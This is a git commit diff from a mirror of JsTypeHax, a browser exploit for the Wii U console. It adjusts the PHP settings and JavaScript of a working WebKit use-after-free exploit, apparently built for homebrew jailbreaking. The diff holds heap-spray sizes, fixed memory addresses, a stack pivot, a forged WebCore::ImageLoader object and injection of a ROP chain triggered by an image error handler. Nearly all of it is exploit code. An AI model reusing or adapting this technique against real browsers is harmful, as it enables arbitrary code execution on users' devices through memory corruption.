mirror of
https://github.com/wiiu-env/JsTypeHax.git
synced 2024-06-16 04:48:48 +02:00
Move a bunch of settings to the php section
Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;"
This commit is contained in:
parent
0867385e16
commit
005ca5a692
38
index.php
38
index.php
|
@ -10,13 +10,20 @@ function hexentities($str) {
|
||||||
|
|
||||||
// Settings
|
// Settings
|
||||||
$_REQUEST['sysver'] = '550'; // Currently hardcoded.
|
$_REQUEST['sysver'] = '550'; // Currently hardcoded.
|
||||||
$payload_size = 0x8000;
|
$generatebinrop = 1; // Make sure the $ROPCHAIN will be in binary.
|
||||||
$pivotAdressAdress = 0x1B800000; //r6
|
|
||||||
$payload_srcaddr = 0x1D600000;
|
|
||||||
$ROPHEAP = $payload_srcaddr + 0x800000;
|
|
||||||
$ROPCHAIN_JS_VAR = 1;
|
|
||||||
|
|
||||||
$USE_FIXED_PAYLOAD_LEGNTH = 0x400000; // This may be useless, but it worked once.. soo..
|
$pivotAdress = 0x010ADDCC; // don't change this.
|
||||||
|
$payload_size = 0x20000; // the codegen is 128kb max.
|
||||||
|
$pivotAdressAdress = 0x1B800000; // where does this come from? Seems to be stable with the current spraying
|
||||||
|
|
||||||
|
// These values could be adjusted to increase success rate.
|
||||||
|
$payload_srcaddr = 0x1D500000 - 0x00A10000;
|
||||||
|
$payload_spray_size = 0x400000;
|
||||||
|
|
||||||
|
$ROPHEAP = $payload_srcaddr - 0x1000; //+ is a BAD idea as is may override our payload
|
||||||
|
|
||||||
|
$ropchainselect = 1; // Put codebin on heap and search it.
|
||||||
|
//$ropchainselect = 2; // Put codebin into ROP (Only works with reaaaaaally small payloads.
|
||||||
|
|
||||||
/**
|
/**
|
||||||
Expects a wiiuhaxx_common_cfg.php with the following variables
|
Expects a wiiuhaxx_common_cfg.php with the following variables
|
||||||
|
@ -38,20 +45,22 @@ Result: Bug is present, crash
|
||||||
function UaF(a){
|
function UaF(a){
|
||||||
//Warning, the delta was modified !
|
//Warning, the delta was modified !
|
||||||
var delta = 0x0<!--#echo var="delta" -->000000; //from 0x0 to 0x04000000 step by 0x01000000
|
var delta = 0x0<!--#echo var="delta" -->000000; //from 0x0 to 0x04000000 step by 0x01000000
|
||||||
var pivotAdress = 0x010ADDCC;
|
var pivotAdress = <?php echo $pivotAdress ?>;
|
||||||
//5.5.2
|
//5.5.2
|
||||||
{
|
{
|
||||||
var pivotAdressAdress = 0x1B800000; //r6
|
var pivotAdressAdress = <?php echo $pivotAdressAdress ?>; //r6
|
||||||
var payloadAdress = 0x1D600000 + delta;
|
var payloadAdress = <?php echo $payload_srcaddr ?> + delta;
|
||||||
}
|
}
|
||||||
|
|
||||||
var codegenAddress = 0x01800000;
|
var codegenAddress = 0x01800000; // don't change this.
|
||||||
var sizeWebCoreImageLoader = 0x18;
|
var sizeWebCoreImageLoader = 0x18; // don't change this.
|
||||||
var sprayCount = 0x1900;
|
|
||||||
|
var payloadsize = <?php echo $payload_size; ?>;
|
||||||
|
var sprayCount = <?php echo $payload_spray_size; ?>/payloadsize;
|
||||||
var _4K = 0x1000;
|
var _4K = 0x1000;
|
||||||
var _16K = 0x4000;
|
var _16K = 0x4000;
|
||||||
var _32K = 0x8000;
|
var _32K = 0x8000;
|
||||||
|
|
||||||
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
|
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
|
||||||
a.type="radio";
|
a.type="radio";
|
||||||
|
|
||||||
|
@ -78,7 +87,6 @@ function UaF(a){
|
||||||
dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL
|
dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL
|
||||||
dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent
|
dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent
|
||||||
dv.setUint32(0x14, 0x00000000); //padding
|
dv.setUint32(0x14, 0x00000000); //padding
|
||||||
|
|
||||||
|
|
||||||
<?php echo "var realROPChain = [" . hexentities($ROPCHAIN) . "]"; ?> // creates "var realROPChain = [...];"
|
<?php echo "var realROPChain = [" . hexentities($ROPCHAIN) . "]"; ?> // creates "var realROPChain = [...];"
|
||||||
|
|
||||||
|
@ -132,4 +140,4 @@ function UaF(a){
|
||||||
}
|
}
|
||||||
</script>
|
</script>
|
||||||
|
|
||||||
<input id="x" type="image" onerror="UaF(this);" src=""/>
|
<input id="x" type="image" onerror="UaF(this);" src=""/>
|
Loading…
Reference in New Issue
Block a user